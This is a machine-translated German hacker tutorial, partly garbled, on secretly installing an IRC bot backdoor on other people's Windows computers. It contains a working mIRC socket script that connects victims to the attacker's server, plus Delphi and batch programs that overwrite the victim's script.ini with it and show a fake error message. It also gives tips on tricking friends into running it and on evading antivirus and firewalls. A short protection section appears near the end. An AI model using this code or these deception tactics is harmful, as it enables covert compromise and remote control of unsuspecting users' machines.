This page has been robot translated, sorry for typos if any. Original content here.

Wir hängen den Bot unter Windows auf.



1. Intro.
2. Trojaner.
3. mIRC-Skripte.
I. Schreiben Sie Ihre Skript-Hintertür
II. schreibe auf das Delphi-Programm, das die Hintertür in den feindlichen mIRC einfügt
III. schreibe auf batch'ah prog, welches die Hintertür in den feindlichen mIRC einfügt
IV. Social Engineering: vparivayu prog =)
4. Beide Wege im Vergleich.
5. Wie man sich schützt.
6. Outro.

1. In der heutigen Zeit war es unter den Besitzern beliebter Kanäle ein Trend, an den Tunneln für ein Dutzend Bots aus verschiedenen Linux-Shells zu hängen, um sozusagen "Channel-Sicherheit" zu bieten. Ich habe natürlich nichts gegen alle Eierlauten da draußen, aber wie man ein einfacher sterblicher Benutzer ist, der keine Shell, scc oder Wissen hat (wie die Elite von Kanal # 31337 auf dem Server irc.dal.net.ru =)? In diesem Artikel werde ich Ihnen sagen, wie Sie einen Bot auf einem Rechner mit einem win-ähnlichen Betriebssystem aufhängen können.
IMHO, gibt es nur zwei Möglichkeiten, dies zu tun: Trojaner und Trojaner =) Beginnen wir mit dem ersten.

2. Wenn Sie vor dem Schließen auf msn (irc.msn.com) waren, habe ich wahrscheinlich die n-te Anzahl an Bots auf den Kanälen #russian_chat, #russian_girls, #russian_andybig und so weiter genossen. Also, diese Bots sind keine Eier. Das ist sozusagen SubSeven. Von einem solchen Pferd gehört? Sub7 ist der einzige Trojaner in meinem Gedächtnis, der es Ihnen ermöglicht, IRC-Bot remote zu hängen (ich habe lange keine Trojaner benutzt, also weiß ich nicht, ob es irgendwelche Analoga hat). Laden Sie Sub'a hier herunter und genießen Sie es. Diejenigen, die es nicht gewohnt sind, nach einfachen Wegen zu suchen, können weiter lesen.

3. Die Fähigkeiten von mirc Skripten sind sehr beeindruckend. Um auf sie zu schreiben, ist derselbe Cgi-Scanner eine unbedeutende Angelegenheit, ganz zu schweigen von einem einfachen Bot. Nehmen Sie zum Beispiel das Skript WarSatan. Es ist einfach gebaut und so ein "einfacher Bot." Wenn Sie sich mit Ihrem Lieblings-IRC-Server verbinden, verbindet das Skript unterwegs den Gast des Benutzers mit dem Server irc.webchat.org und wickelt es auf den Kanälen #CHATOP, #MEKAH und #PANGKOR auf. Das ist der ganze Mechanismus der Arbeit. Unsere Aufgabe ist es, die gleiche einfache Backdoor in Form eines World-Plug-Ins zu schreiben.
I. Ich werde zu den wichtigsten Zeilen Stellung nehmen.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


Wir entfernen Kommentare, ersetzen unsere Werte, nummerieren die Zeilen (kopiere sie einfach in den mIRC-Editor und speichern sie - er selbst nummeriert alle) und speichern die resultierende Datei control.dll.
Die Hintertür selbst ist fertig. Jetzt bleibt es in die script.ini von jemand anderem einzufügen.

II. Hier ist die Quelle für das Delphi-Programm, das die Schraube nach der Datei script.ini durchsucht und bei erfolgreichem Suchresultat durch unser ersetzt.

Wichtig! Control.dll sollte im selben Verzeichnis mit diesem Programm gehalten werden.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. Wenn Sie nicht mit der Gattung kodieren und das Cha aus dem Wort "Compiler" in die Hefe wirft, schreiben wir ein solches Programm auf batch'ah.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

Dieses Kanu nach einer Poke-Methode sucht nach mIRC, NeoRa Trion und Looksharp. Die Wahrscheinlichkeit des Auffindens ist eher unbedeutend, weshalb es wünschenswert ist, das Thema dazu zu bringen, diese Datei zusammen mit control.dll in einem Verzeichnis mit seinem IRC-Client zu platzieren. Im Falle eines erfolgreichen Suchergebnisses wird die Datei durch eine andere script.ini durch unsere control.dll ersetzt.
Wandle diesen bat'nik in exe'shnik um, und du kannst deine Freunde vparivieren.

IV. Ich denke, es ist nicht für mich zu sagen, wie man jemanden exe'shnik "vparivat". Ich möchte nur eine Funktion betonen. Stimmen Sie zu, bitte starten Sie Ihre exe'shnik beschwört auch bei den intimsten Benutzer Verdacht. So können Sie den anderen Weg gehen. Gehen Sie dazu zurück zu Schritt I. Geben Sie die Zeile des Skripts nicht an, sondern fügen Sie sie einfach in die Datei joke.mrc ein. Das ist alles. Geben Sie es jetzt Ihren Freunden mit den Worten: Legen Sie es in den Katalog mit Ihrer Welt, geben Sie in die Konsole "/ load -rs joke.mrc" ein und genießen Sie den ganzen Charme des Steckers =)

4. Und so, Was ist der beste Weg, script.ini zu ersetzen?
1) wird nicht von Antivirensoftware erfasst
2) wird nicht von FairWalls erfasst. Ich denke, dass viele Leute beginnen werden, mit ihrem Schaum aus dem Mund zu beweisen, dass ZoneAlarm und AtGuard sie davor schützen werden. Speziell für sie erkläre ich: wenn mIRC in diesen beiden Firewalls als Allowed Server \ Client registriert ist, schaut der FV nicht einmal nach, wenn die Verbindung von der Backdoor geöffnet wird.
3) es ist schwierig, selbst einen erfahrenen Benutzer zu erkennen / zu töten

5. Und jetzt darüber, wie Sie sich schützen können. Auch hier werde ich die Methode nicht mit Sub7'om betrachten (weil damit alles klar ist: AVP + ZoneAlarm), gehe ich sofort auf die zweite.
Für die Erkennung einer Skript-Backdoor lohnt es sich, einige mIRC-Plugins wie IPSearch'a zu verwenden, die auf dem Server des Benutzers mit der gleichen IP suchen wie Sie. Wenn es einen gibt, dann hat jemand auf jeden Fall einen Bot an dich gehängt. Wenn dies nicht gefunden wird, dann ist entweder der Bot auf einem anderen Server oder Sie sind sauber.
Um den Bot zu erkennen, können Sie auch denselben ZAlarm verwenden: Derzeit überprüfen die größten IRC-Server alle Clients auf dem Proxy. Auf welche Weise? Ein einfacher Port-Scan. Wenn Sie also eine Verbindung zum Server irc.some.com herstellen und die Ports auf der irc.lame.com-Seite scannen, lohnt es sich, darüber nachzudenken ...
Wie man eine Hintertür tötet? Wenn Sie das Skript nicht verstehen, installieren Sie einfach den IRC-Client neu.

6. Nun, was kann ich abschließend sagen? Verwenden Sie keine unbekannten Skripte und zwingen Sie keine anderen dazu, dies zu tun =)